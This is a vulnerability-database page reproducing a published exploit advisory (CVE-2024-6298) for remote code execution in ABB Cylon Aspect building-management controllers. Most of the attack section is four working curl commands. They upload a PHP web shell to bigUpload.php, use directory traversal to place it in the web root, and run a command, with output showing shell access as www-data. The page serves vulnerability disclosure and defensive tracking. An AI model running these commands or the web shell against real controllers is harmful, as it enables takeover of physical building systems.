Vulners
Lucene search
ABB Cylon Aspect 3.08.01 - Remote Code Execution (RCE)
| Reporter | Title | Published | Views | Family All 15 |
|---|---|---|---|---|
 | ABB Cylon Aspect 3.08.01 Remote Code Execution Vulnerability | 24 Sep 202400:00 | – | zdt |
 | CVE-2024-6298 | 5 Jul 202414:09 | – | circl |
 | ABB ASPECT Input Validation Error Vulnerability | 5 Jul 202400:00 | – | cnnvd |
 | CVE-2024-6298 | 5 Jul 202411:06 | – | cve |
 | CVE-2024-6298 remote code execution | 5 Jul 202411:06 | – | cvelist |
 | EUVD-2024-47993 | 5 Jul 202411:06 | – | euvd |
 | Vulnerabilities fixed in ABB ASPECT, NEXUS Series and MATRIX Series | 6 Dec 202411:49 | – | ncsc |
 | CVE-2024-6298 | 5 Jul 202411:15 | – | nvd |
 | CVE-2024-6298 | 5 Jul 202411:15 | – | osv |
 | ABB Cylon Aspect 3.08.01 Remote Code Execution | 24 Sep 202400:00 | – | packetstorm |
10
# Exploit Title : ABB Cylon Aspect 3.08.01 - Remote Code Execution (RCE)
Vendor: ABB Ltd.
Product web page: https://www.global.abb
Affected version: NEXUS Series, MATRIX-2 Series, ASPECT-Enterprise, ASPECT-Studio
Firmware: <=3.08.01
Summary: ASPECT is an award-winning scalable building energy management
and control solution designed to allow users seamless access to their
building data through standard building protocols including smart devices.
Desc: The ABB BMS/BAS controller suffers from a remote code execution
vulnerability. The vulnerable uploadFile() function in bigUpload.php
improperly reads raw POST data using the php://input wrapper without
sufficient validation. This data is passed to the fwrite() function,
allowing arbitrary file writes. Combined with an improper sanitization
of file paths, this leads to directory traversal, allowing an attacker
to upload malicious files to arbitrary locations. Once a malicious file
is written to an executable directory, an authenticated attacker can
trigger the file to execute code and gain unauthorized access to the
building controller.
Tested on: GNU/Linux 3.15.10 (armv7l)
GNU/Linux 3.10.0 (x86_64)
GNU/Linux 2.6.32 (x86_64)
Intel(R) Atom(TM) Processor E3930 @ 1.30GHz
Intel(R) Xeon(R) Silver 4208 CPU @ 2.10GHz
PHP/7.3.11
PHP/5.6.30
PHP/5.4.16
PHP/4.4.8
PHP/5.3.3
AspectFT Automation Application Server
lighttpd/1.4.32
lighttpd/1.4.18
Apache/2.2.15 (CentOS)
OpenJDK Runtime Environment (rhel-2.6.22.1.-x86_64)
OpenJDK 64-Bit Server VM (build 24.261-b02, mixed mode)
Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
@zeroscience
Advisory ID: ZSL-2024-5828
Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2024-5828.php
CVE ID: CVE-2024-6298
CVE URL: https://cve.mitre.org/cgi-bin/cvename.cgi?name=2024-6298
21.04.2024
--
$ cat project
P R O J E C T
.|
| |
|'| ._____
___ | | |. |' .---"|
_ .-' '-. | | .--'| || | _| |
.-'| _.| | || '-__ | | | || |
|' | |. | || | | | | || |
____| '-' ' "" '-' '-.' '` |____
░▒▓███████▓▒░░▒▓███████▓▒░ ░▒▓██████▓▒░░▒▓█▓▒░▒▓███████▓▒░
░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░
░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░
░▒▓███████▓▒░░▒▓███████▓▒░░▒▓████████▓▒░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░
░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░
░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░
░▒▓███████▓▒░░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░
░▒▓████████▓▒░▒▓██████▓▒░ ░▒▓██████▓▒░
░▒▓█▓▒░░░░░░░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░
░▒▓█▓▒░░░░░░░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░░░░░░
░▒▓██████▓▒░░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒▒▓███▓▒░
░▒▓█▓▒░░░░░░░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░
░▒▓█▓▒░░░░░░░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░
░▒▓█▓▒░░░░░░░░▒▓██████▓▒░ ░▒▓██████▓▒░
1.
$ curl -X POST "http://192.168.73.31/bigUpload.php?action=upload&key=251" \
> -H "Cookie: PHPSESSID=25131337" \
> -H "Content-Type: application/x-www-form-urlencoded" \
> -d "<?php\r\nif ($_GET['j']) {\r\nsystem($_GET['j']);\r\n}\r\n?>"
2.
$ curl -X POST "http://192.168.73.31/bigUpload.php?action=upload&key=251" \
> -H "Cookie: PHPSESSID=25131337" \
> –H "Content-Type: application/x-www-form-urlencoded"
3.
$ curl -X POST "http://192.168.73.31/bigUpload.php?action=finish" \
> -H "Cookie: PHPSESSID=25131337" \
> -H "Content-Type: application/x-www-form-urlencoded" \
> -d "key=251&name=../../../../../../../home/MIX_CMIX/htmlroot/ZSL.php"
4.
$ curl http://192.168.73.31/ZSL.php?j=id
uid=33(www-data) gid=33(www-data) groups=33(www-data)Data
Build on a solid foundation with Vulners data
We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data
Api
Power your application with Vulners API
The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access
App
Assess and manage vulnerabilities with Vulners tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation
02 Apr 2025 00:00Current
9.6High risk
Vulners AI Score9.6
CVSS 3.19.8 - 10
CVSS 49.4
EPSS0.25939
SSVC